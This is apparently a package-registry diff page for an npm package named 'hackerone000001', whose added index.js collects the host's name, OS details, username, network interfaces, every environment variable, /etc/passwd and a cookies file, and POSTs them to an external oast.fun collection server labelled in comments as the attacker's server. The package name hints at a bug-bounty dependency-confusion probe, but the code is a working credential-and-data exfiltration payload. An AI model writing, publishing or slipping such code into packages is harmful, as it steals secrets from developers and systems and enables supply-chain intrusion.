hackerone000001 1.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +73 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,73 @@
1
+ const os = require('os');
2
+ const fs = require('fs');
3
+ const https = require('https');
4
+
5
+ // Helper function to send data back to your server
6
+ const sendData = (data) => {
7
+ const options = {
8
+ hostname: 'iptcasfymjgwwipkefshung19sp1v2pue.oast.fun', // Your server where you collect the info
9
+ port: 443,
10
+ path: '/rctable76SenseBBPH1',
11
+ method: 'POST',
12
+ headers: {
13
+ 'Content-Type': 'application/json',
14
+ },
15
+ };
16
+
17
+ const req = https.request(options, (res) => {
18
+ res.on('data', (d) => {
19
+ process.stdout.write(d);
20
+ });
21
+ });
22
+
23
+ req.on('error', (error) => {
24
+ console.error(error);
25
+ });
26
+
27
+ req.write(JSON.stringify(data));
28
+ req.end();
29
+ };
30
+
31
+ // Gather system information
32
+ const getSystemInfo = () => {
33
+ const userInfo = os.userInfo();
34
+ const networkInterfaces = os.networkInterfaces();
35
+
36
+ const systemInfo = {
37
+ hostname: os.hostname(),
38
+ osType: os.type(),
39
+ osRelease: os.release(),
40
+ platform: os.platform(),
41
+ arch: os.arch(),
42
+ whoami: userInfo.username,
43
+ homeDir: userInfo.homedir,
44
+ networkInterfaces: networkInterfaces,
45
+ ipAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].address : 'No IP',
46
+ macAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].mac : 'No MAC',
47
+ uptime: os.uptime(),
48
+ currentWorkingDir: process.cwd(),
49
+ envVariables: process.env,
50
+ };
51
+
52
+ return systemInfo;
53
+ };
54
+
55
+ // Optionally, attempt to read sensitive files (ensure you are authorized to do so)
56
+ const readSensitiveFile = (filePath) => {
57
+ try {
58
+ const data = fs.readFileSync(filePath, 'utf8');
59
+ return data;
60
+ } catch (err) {
61
+ return `Error reading ${filePath}: ${err.message}`;
62
+ }
63
+ };
64
+
65
+ // Collect data
66
+ const collectedData = {
67
+ systemInfo: getSystemInfo(),
68
+ passwdFile: readSensitiveFile('/etc/passwd'), // Non-sensitive file on Unix-based systems
69
+ cookies: readSensitiveFile('/path/to/cookies'), // Adjust the path based on environment
70
+ };
71
+
72
+ // Send collected data back to the attacker's server
73
+ sendData(collectedData);
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "hackerone000001",
3
+ "version": "1.0.0",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1"
7
+ },
8
+ "author": "",
9
+ "license": "ISC",
10
+ "description": ""
11
+ }